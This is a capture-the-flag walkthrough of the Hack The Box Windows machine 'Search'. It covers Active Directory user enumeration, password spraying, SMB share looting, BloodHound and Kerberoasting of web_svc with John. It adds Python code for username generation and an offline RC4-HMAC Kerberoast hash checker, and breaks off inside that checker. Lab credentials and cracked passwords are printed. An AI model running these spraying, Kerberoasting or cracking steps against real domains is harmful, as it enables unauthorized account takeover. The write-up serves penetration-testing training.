
Hack The Box - Search

After enumerating users and finding credentials on the website, we performed Kerberoasting. Password spraying then gave us access to another user, whose folder held an Excel file with a list of passwords; one of them gave us access through PowerShell Web Access. Finally, a BloodHound path led to a user in the Domain Admins group and from there to Administrator.

Name: Search
OS: Windows
Points: 40
Difficulty: Hard
IP: 10.10.11.129
Maker: dmw0ng

Matrix (user rating, radar chart): Enumeration 8, Real-Life 7.4, CVE 5.1, Custom Exploitation 4.9, CTF-Like 2.6. No maker rating was submitted (all zeros).

Recon

nmap

nmap shows multiple open ports. DNS, Kerberos (88/464), LDAP (389/3268), SMB and .NET Message Framing on 9389 (ADWS) together mark the host RESEARCH as a domain controller for search.htb; IIS answers on 80/443, and 8172 is the IIS Web Management Service (its certificate is named WMSvc-SHA2-RESEARCH). SMB signing is enabled and required, so NTLM relay to this host is not an option.

# Nmap 7.91 scan initiated Fri Mar  4 22:59:35 2022 as: nmap -p53,80,88,135,139,389,443,445,464,593,3268,8172,9389,49666,49675,49676,49703,49714,49738 -sV -sC -oN nmap_scan 10.10.11.129
Nmap scan report for 10.10.11.129 (10.10.11.129)
Host is up (0.37s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-04 22:59:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-03-04T23:01:13+00:00; -5s from scanner time.
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-03-04T23:01:13+00:00; -5s from scanner time.
| tls-alpn:
|_  http/1.1
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-03-04T23:01:13+00:00; -8s from scanner time.
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
|_ssl-date: 2022-03-04T23:01:13+00:00; -5s from scanner time.
| tls-alpn:
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49703/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC
49738/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -5s, deviation: 1s, median: -5s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-03-04T23:00:37
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar  4 23:01:22 2022 -- 1 IP address (1 host up) scanned in 106.92 seconds

RPC

A null session over RPC returns nothing; authentication is required.

 π ~/htb/search ❯ rpcclient -U "" -N 10.10.11.129
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $>

Samba

As with RPC, SMB requires authentication to list the shares.

 π ~/htb/search ❯ crackmapexec smb 10.10.11.129 -u '' -p '' --shares
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\: STATUS_ACCESS_DENIED
SMB         10.10.11.129    445    RESEARCH         [-] Error enumerating shares: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
 π ~/htb/search 

Ldap

LDAP returns the naming contexts anonymously (the base DN is DC=search,DC=htb), but any search below the root requires a successful bind.

 π ~/htb/search ❯ ldapsearch -x -h 10.10.11.129 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#

#
dn:
namingcontexts: DC=search,DC=htb
namingcontexts: CN=Configuration,DC=search,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=search,DC=htb
namingcontexts: DC=DomainDnsZones,DC=search,DC=htb
namingcontexts: DC=ForestDnsZones,DC=search,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
 π ~/htb/search ❯ ldapsearch -x -h 10.10.11.129 -D '' -w '' -b 'DC=search,DC=htb'
# extended LDIF
#
# LDAPv3
# base <DC=search,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1
 π ~/htb/search ❯

Web Site

The web site's headers show it runs on Microsoft IIS 10 with ASP.NET.

 π ~/htb/search ❯ curl -sI 10.10.11.129
HTTP/1.1 200 OK
Content-Length: 44982
Content-Type: text/html
Last-Modified: Tue, 11 Aug 2020 10:13:04 GMT
Accept-Ranges: bytes
ETag: "5f3800c86fd61:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Fri, 04 Mar 2022 23:03:12 GMT

The site presents services, features and company information (team, testimonials, etc.). The contact form shows the domain search.htb, which we add to /etc/hosts.

[image: contact form showing the search.htb domain]

Directory Brute Forcing

feroxbuster finds several pages; one of them, /staff, returns 403. IIS resolves paths case-insensitively, which is why the same resources show up as /images, /Images and /IMAGES.

 π ~/htb/search ❯ feroxbuster -u http://search.htb -w $MD --depth 1 -x asp,aspx,html

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.5.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://search.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.5.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [asp, aspx, html]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 1
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301      GET        2l       10w      148c http://search.htb/images => http://search.htb/images/
200      GET     1030l     2969w    44982c http://search.htb/index.html
200      GET       17l       76w      931c http://search.htb/main.html
301      GET        2l       10w      148c http://search.htb/Images => http://search.htb/Images/
403      GET       29l       92w     1233c http://search.htb/staff
301      GET        2l       10w      145c http://search.htb/css => http://search.htb/css/
200      GET     1030l     2969w    44982c http://search.htb/Index.html
301      GET        2l       10w      144c http://search.htb/js => http://search.htb/js/
200      GET       17l       76w      931c http://search.htb/Main.html
403      GET       29l       92w     1233c http://search.htb/Staff
301      GET        2l       10w      147c http://search.htb/fonts => http://search.htb/fonts/
301      GET        2l       10w      148c http://search.htb/IMAGES => http://search.htb/IMAGES/
200      GET     1030l     2969w    44982c http://search.htb/INDEX.html
301      GET        2l       10w      147c http://search.htb/Fonts => http://search.htb/Fonts/
200      GET      373l     1419w    19559c http://search.htb/single.html
301      GET        2l       10w      145c http://search.htb/CSS => http://search.htb/CSS/
301      GET        2l       10w      144c http://search.htb/JS => http://search.htb/JS/
200      GET       17l       76w      931c http://search.htb/MAIN.html
500      GET       80l      276w     3420c http://search.htb/%22julie%20roehm%22.aspx
500      GET       80l      276w     3420c http://search.htb/%22james%20kim%22.aspx
500      GET       80l      276w     3420c http://search.htb/%22britney%20spears%22.aspx

Restricted Site

Visiting /staff returns 403 with a message saying the credentials we supplied do not have permission to view the directory or page.

[image: 403 page at /staff]

Recall that nmap also shows port 443 (https). Browsing to https://search.htb/staff, the server asks for a client certificate, so a certificate is required to reach this page.

[image: browser prompt for a client certificate]

Enum Users

Kerbrute

We enumerate users with the SecLists wordlist xato-net-10-million-usernames and find two valid accounts, administrator and research (kerbrute reports each twice because the list contains both capitalizations and Active Directory matches principal names case-insensitively). They did not get us any further on the other services.

 π ~/htb/search ❯ ./kerbrute userenum -d search.htb xato-net-10-million-usernames-dup.txt --dc 10.10.11.129 -t 100

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 04/01/22 - Ronnie Flathers @ropnop

2022/04/01 19:10:24 >  Using KDC(s):
2022/04/01 19:10:24 >   10.10.11.129:88

2022/04/01 19:10:55 >  [+] VALID USERNAME:    administrator@search.htb
2022/04/01 19:11:09 >  [+] VALID USERNAME:    research@search.htb
2022/04/01 19:11:51 >  [+] VALID USERNAME:    Administrator@search.htb
2022/04/01 19:51:39 >  [+] VALID USERNAME:    RESEARCH@search.htb
2022/04/01 19:54:18 >  Done! Tested 624370 usernames (4 valid) in 2634.573 seconds

Usernames

Recall that the website lists names in the Team section; we use them to build a new wordlist with a Python script.

Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart
John Smith
Christine Aguilar
Robert Spears
Bruce Rogers

We generate 120 candidate usernames (10 formats per name).

 π ~/htb/search/usernames ❯ ./usernames.py team.txt > users.txt
 π ~/htb/search/usernames ❯ wc -l users.txt
120 users.txt
 π ~/htb/search/usernames ❯
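The writeup does not reproduce its usernames.py, so here is an added example of such a generator (not the author's script). It emits the ten naming formats most often seen in AD from each "First Last" line, which is why 12 team names give the 120 candidates above; the first format, first.last, is the one search.htb turns out to use. The embedded team list is copied from the page; the choice of formats and the handling of middle names are assumptions.

```python
#!/usr/bin/env python3
"""Generate username candidates from a list of full names (added example).

Usage: ./gen_usernames.py team.txt > users.txt   (reads TEAM below if no file given)
"""
import sys

# Constructed input: the Team section of the site as listed in the writeup.
TEAM = """Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart
John Smith
Christine Aguilar
Robert Spears
Bruce Rogers"""


def username_formats(full_name):
    """Candidate usernames for one 'First Last' name, in a fixed order."""
    parts = full_name.lower().split()
    if len(parts) < 2:
        return parts            # a single token is used as-is
    first, last = parts[0], parts[-1]   # assumption: middle names are ignored
    f, l = first[0], last[0]
    return [
        f"{first}.{last}",   # keely.lyons  (the format search.htb uses)
        f"{first}{last}",    # keelylyons
        f"{f}.{last}",       # k.lyons
        f"{f}{last}",        # klyons
        f"{first}{l}",       # keelyl
        f"{first}.{l}",      # keely.l
        f"{last}.{first}",   # lyons.keely
        f"{last}{first}",    # lyonskeely
        f"{last}{f}",        # lyonsk
        f"{first}_{last}",   # keely_lyons
    ]


def generate(names):
    """All candidates, deduplicated in order so kerbrute never tests a name twice."""
    seen, out = set(), []
    for name in names:
        for user in username_formats(name):
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    source = open(sys.argv[1]) if len(sys.argv) > 1 else TEAM.splitlines()
    for user in generate(line.strip() for line in source if line.strip()):
        print(user)
```

The same generator, fed the lines of the handwritten note further down, is what turns "Hope Sharp" into hope.sharp.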

kerbrute finds three valid usernames, all in the first.last format.

 π ~/htb/search ❯  ./kerbrute userenum -d search.htb usernames/users.txt --dc 10.10.11.129

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 04/01/22 - Ronnie Flathers @ropnop

2022/04/01 20:24:26 >  Using KDC(s):
2022/04/01 20:24:26 >   10.10.11.129:88

2022/04/01 20:24:26 >  [+] VALID USERNAME:    keely.lyons@search.htb
2022/04/01 20:24:26 >  [+] VALID USERNAME:    dax.santiago@search.htb
2022/04/01 20:24:26 >  [+] VALID USERNAME:    sierra.frye@search.htb
2022/04/01 20:24:27 >  Done! Tested 120 usernames (3 valid) in 0.849 seconds
 π ~/htb/search ❯

However, no combination of these valid usernames got us in over SMB, LDAP or RPC.

keely.lyons
dax.santiago
sierra.frye
administrator
research

Note - Creds

On the website there is an image of a handwritten note. It mentions several names and "Send password to Hope Sharp", followed by IsolationIsKey?, which could be that password.

[image: note listing tasks, names and IsolationIsKey?]

We build a wordlist from the names and the "relevant" words in the note, again using the Python script.

Working from Home
Key staff to stay
Hospital Appointment
Harrods
9am Phisher Walter
Send password to Hope Sharp
IsolationIsKey?
Meeting with Board
Hunter and Jordan
Hunter Jordan
Jordan Hunter
Harrods Jordan
Harrods Hunter

We run kerbrute against the new wordlist: hope.sharp is a valid user.

 π ~/htb/search ❯ ./kerbrute userenum -d search.htb --dc 10.10.11.129 wordlist_image.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 04/01/22 - Ronnie Flathers @ropnop

2022/04/01 21:14:28 >  Using KDC(s):
2022/04/01 21:14:28 >   10.10.11.129:88

2022/04/01 21:14:28 >  [+] VALID USERNAME:    hope.sharp@search.htb
2022/04/01 21:14:28 >  Done! Tested 70 usernames (1 valid) in 0.506 seconds
 π ~/htb/search ❯

SMB - Hope Sharp

Password Spraying

We take the wordlist with all the valid users found so far and spray the candidate password IsolationIsKey? against it. A single password per account is safe; before trying more, check the domain lockout policy once you have a working credential (for example crackmapexec smb search.htb -u hope.sharp -p 'IsolationIsKey?' --pass-pol) so the spray does not lock out every user.

keely.lyons
dax.santiago
sierra.frye
administrator
research
hope.sharp

hope.sharp:IsolationIsKey? is a valid combination, as the note suggested.

 π ~/htb/search ❯ crackmapexec smb search.htb -u usernames/valid_users.txt -p 'IsolationIsKey?' --continue-on-success
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [-] search.htb\keely.lyons:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         search.htb      445    RESEARCH         [-] search.htb\dax.santiago:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         search.htb      445    RESEARCH         [-] search.htb\sierra.frye:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         search.htb      445    RESEARCH         [-] search.htb\administrator:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         search.htb      445    RESEARCH         [-] search.htb\research:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         search.htb      445    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey?
 π ~/htb/search ❯

The credentials also work for an LDAP bind.

 π ~/htb/search ❯ crackmapexec ldap search.htb -u 'hope.sharp' -p 'IsolationIsKey?'
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
LDAP        search.htb      389    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey?
 π ~/htb/search ❯

SMB

We enumerate the shares Hope has access to. Besides the default NETLOGON, SYSVOL and IPC$, there are CertEnroll (READ) and RedirectedFolders$ (READ,WRITE); helpdesk exists but is not readable by this user.

 π ~/htb/search ❯ crackmapexec smb search.htb -u 'hope.sharp' -p 'IsolationIsKey?' --shares
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey?
SMB         search.htb      445    RESEARCH         [+] Enumerated shares
SMB         search.htb      445    RESEARCH         Share           Permissions     Remark
SMB         search.htb      445    RESEARCH         -----           -----------     ------
SMB         search.htb      445    RESEARCH         ADMIN$                          Remote Admin
SMB         search.htb      445    RESEARCH         C$                              Default share
SMB         search.htb      445    RESEARCH         CertEnroll      READ            Active Directory Certificate Services share
SMB         search.htb      445    RESEARCH         helpdesk
SMB         search.htb      445    RESEARCH         IPC$            READ            Remote IPC
SMB         search.htb      445    RESEARCH         NETLOGON        READ            Logon server share
SMB         search.htb      445    RESEARCH         RedirectedFolders$ READ,WRITE
SMB         search.htb      445    RESEARCH         SYSVOL          READ            Logon server share
 π ~/htb/search ❯

CertEnroll is the AD CS publication share: the CA certificate (search-RESEARCH-CA), two CRLs and an .asp stub. That is the CA's public material, not a client certificate, so it does not help with the restricted site.

 π ~/htb/search/certenroll ❯ smbclient //search.htb/CertEnroll -U 'hope.sharp' # IsolationIsKey?
Enter WORKGROUP\hope.sharp's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Tue Apr  5 00:51:28 2022
  ..                                 Dc        0  Tue Apr  5 00:51:28 2022
  nsrev_search-RESEARCH-CA.asp       Ac      330  Tue Apr  7 03:29:31 2020
  Research.search.htb_search-RESEARCH-CA.crt     Ac      883  Tue Apr  7 03:29:29 2020
  search-RESEARCH-CA+.crl            Ac      735  Tue Apr  5 00:51:28 2022
  search-RESEARCH-CA.crl             Ac     1047  Tue Apr  5 00:51:28 2022

      3246079 blocks of size 4096. 420635 blocks available
smb: \>

RedirectedFolders$ holds redirected home directories, one per user. The folder list is itself a second user list (23 names in first.last format).

 π ~/htb/search ❯ smbclient //search.htb/RedirectedFolders$ -U 'hope.sharp' # IsolationIsKey?
Enter WORKGROUP\hope.sharp's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Tue Apr  5 22:27:00 2022
  ..                                 Dc        0  Tue Apr  5 22:27:00 2022
  abril.suarez                       Dc        0  Tue Apr  7 14:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 09:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 08:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 14:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 08:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 14:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 09:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 08:02:04 2020
  dax.santiago                       Dc        0  Tue Apr  7 14:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 07:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 16:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 08:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 14:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 14:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 10:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 14:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 09:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 16:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 07:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 14:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 08:21:42 2020
  sierra.frye                        Dc        0  Wed Nov 17 20:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 16:14:26 2020

      3246079 blocks of size 4096. 420632 blocks available
smb: \>

sierra.frye's Desktop holds user.txt, but hope.sharp cannot read it.

smb: \sierra.frye\Desktop\> ls
  .                                 DRc        0  Wed Nov 17 20:08:00 2021
  ..                                DRc        0  Wed Nov 17 20:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 08:28:05 2020
  user.txt                           Ac       33  Wed Nov 17 19:55:27 2021

\sierra.frye\Desktop\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:03:59 2020
  ..                               DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:00 2020

      3246079 blocks of size 4096. 420632 blocks available
smb: \sierra.frye\Desktop\> get user.txt
NT_STATUS_ACCESS_DENIED opening remote file \sierra.frye\Desktop\user.txt
smb: \sierra.frye\Desktop\>

SMB - Web_svc

BloodHound

We collect the AD data with BloodHound.py, using hope.sharp's credentials.

 π BloodHound.py master ❯ ./bloodhound.py -u hope.sharp -p 'IsolationIsKey?' -d SEARCH.HTB -ns 10.10.11.129 -c all --zip
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 107 users
INFO: Found 64 groups
INFO: Found 0 trusts

[.. snip ..]

INFO: Done in 00M 46S
INFO: Compressing output into 20220405224732_bloodhound.zip
  π BloodHound.py master ❯ l
total 1.9M
drwxr-xr-x  6 kali kali 4.0K Apr  5 23:07 .
drwxr-xr-x 12 kali kali 4.0K Apr  5 22:33 ..
-rw-r--r--  1 kali kali 289K Apr  5 22:46 20220405224540_computers.json
-rw-r--r--  1 kali kali 2.5K Apr  5 22:45 20220405224540_domains.json
-rw-r--r--  1 kali kali  92K Apr  5 22:45 20220405224540_groups.json
-rw-r--r--  1 kali kali 246K Apr  5 22:45 20220405224540_users.json
-rw-r--r--  1 kali kali 202K Apr  5 22:47 20220405224652_computers.json
-rw-r--r--  1 kali kali 2.5K Apr  5 22:47 20220405224652_domains.json
-rw-r--r--  1 kali kali  92K Apr  5 22:47 20220405224652_groups.json
-rw-r--r--  1 kali kali 246K Apr  5 22:46 20220405224652_users.json
-rw-r--r--  1 kali kali 629K Apr  5 22:48 20220405224732_bloodhound.zip
drwxr-xr-x  6 kali kali 4.0K Mar  7 21:13 bloodhound
-rwxr-xr-x  1 kali kali   61 Mar  7 21:10 bloodhound.py
drwxr-xr-x  3 kali kali 4.0K Mar  7 21:11 build
-rw-r--r--  1 kali kali  855 Mar  7 21:10 Dockerfile
-rw-r--r--  1 kali kali  227 Mar  7 21:10 .editorconfig
drwxr-xr-x  8 kali kali 4.0K Mar  7 21:10 .git
-rw-r--r--  1 kali kali   49 Mar  7 21:10 .gitignore
-rw-r--r--  1 kali kali 1.1K Mar  7 21:10 LICENSE
drwxr-xr-x  2 kali kali 4.0K Mar  7 21:22 out
-rw-r--r--  1 kali kali 3.4K Mar  7 21:10 README.md
-rw-r--r--  1 kali kali 1.3K Mar  7 21:10 setup.py
 π BloodHound.py master ❯

We start BloodHound and import the generated zip.

[image: BloodHound import of the zip]

Using BloodHound's pre-built queries we list the Kerberoastable users: two, web_svc and krbtgt.

[image: BloodHound "List all Kerberoastable Accounts" result]

Kerberoasting

We use impacket's GetUserSPNs to Kerberoast: the script requests a service ticket for web_svc's SPN and writes its encrypted part (RC4-HMAC, etype 23) in a crackable format.

 π ~/htb/search ❯ impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -outputfile web_svc_kerberos
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation
---------------------------------  -------  --------  --------------------------  ---------  ----------
RESEARCH/web_svc.search.htb:60001  web_svc            2020-04-09 08:59:11.329031  <never>

 π ~/htb/search ❯ cat web_svc_kerberos
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$9e3da68e2397f9818dbf60d3b7ec89bc$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
 π ~/htb/search ❯

Password Hash Cracking

John with rockyou.txt recovers the plaintext: @3ONEmillionbaby.

 π ~/htb/search ❯ john --wordlist=$ROCK web_svc_kerberos
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@3ONEmillionbaby (?)
1g 0:00:00:07 DONE (2022-03-09 20:39) 0.1285g/s 1476Kp/s 1476Kc/s 1476KC/s @421eduymayte619..@#ann!#
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/search ❯
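To show what John is doing with each rockyou candidate against the $krb5tgs$23$ hash above (and why an RC4 service ticket is the weak spot Kerberoasting relies on), here is an added example of the etype 23 check; it is not code from the writeup, John or impacket. For each candidate it derives the NT hash with MD4, derives K1 = HMAC-MD5(NT, key usage 2), K3 = HMAC-MD5(K1, checksum), RC4-decrypts the ticket body with K3 and accepts the password when HMAC-MD5(K1, plaintext) equals the checksum. MD4 is implemented inline because hashlib no longer offers it on OpenSSL 3 systems. The hash it checks is constructed locally from a fake ticket body with a fixed confounder (an assumption, the real web_svc hash is not reproduced); everything else is the real RFC 4757 construction.

```python
"""Offline check of a Kerberoast hash in the $krb5tgs$23$ (RC4-HMAC) format.

Added example. Per candidate: NT = MD4(UTF-16LE(pw)); K1 = HMAC-MD5(NT, usage 2);
K3 = HMAC-MD5(K1, checksum); plaintext = RC4(K3, edata2); accept if
HMAC-MD5(K1, plaintext) == checksum. make_sample_hash() builds a hash from a
fake ticket body (assumption) so the block runs offline.
"""
import hmac
import os
import struct
from hashlib import md5

MASK = 0xFFFFFFFF
KEY_USAGE_TGS_REP_TICKET = 2  # enc-part of the service ticket, what Kerberoasting captures


def md4(data):
    """RFC 1320 MD4 (needed for the NT hash that keys RC4-HMAC)."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = a, b, c, d
        for i in range(48):
            if i < 16:    # round 1: X[i], no constant
                fn, k, s, add = F, i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:  # round 2: X[0,4,8,12,1,5,9,13,...]
                fn, k, s, add = G, (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:         # round 3: X[0,8,4,12,2,10,...] (bit-reversed index)
                fn, k, s, add = H, int(f"{i - 32:04b}"[::-1], 2), (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            A = rotl((A + fn(B, C, D) + X[k] + add) & MASK, s)
            A, B, C, D = D, A, B, C   # register rotation: ABCD -> DABC -> CDAB -> BCDA
        a, b, c, d = ((x + y) & MASK for x, y in zip((a, b, c, d), (A, B, C, D)))
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    S, j = list(range(256)), 0
    for i in range(256):                      # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key, msg):
    return hmac.new(key, msg, md5).digest()


def rc4_hmac_encrypt(nt, plaintext, usage=KEY_USAGE_TGS_REP_TICKET, confounder=None):
    """RFC 4757 encryption, as the KDC does it with the service account's NT hash."""
    k1 = hmac_md5(nt, struct.pack("<I", usage))
    data = (confounder or os.urandom(8)) + plaintext
    checksum = hmac_md5(k1, data)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)


def parse_krb5tgs23(line):
    """'$krb5tgs$23$*user$REALM$spn*$<checksum hex>$<edata2 hex>' -> (checksum, edata2)."""
    head, checksum_hex, edata2_hex = line.strip().rsplit("$", 2)
    if not head.startswith("$krb5tgs$23$"):
        raise ValueError("not an etype 23 krb5tgs hash")
    return bytes.fromhex(checksum_hex), bytes.fromhex(edata2_hex)


def check_password(line, password):
    """True if `password` is the service account password behind this ticket."""
    checksum, edata2 = parse_krb5tgs23(line)
    k1 = hmac_md5(nt_hash(password), struct.pack("<I", KEY_USAGE_TGS_REP_TICKET))
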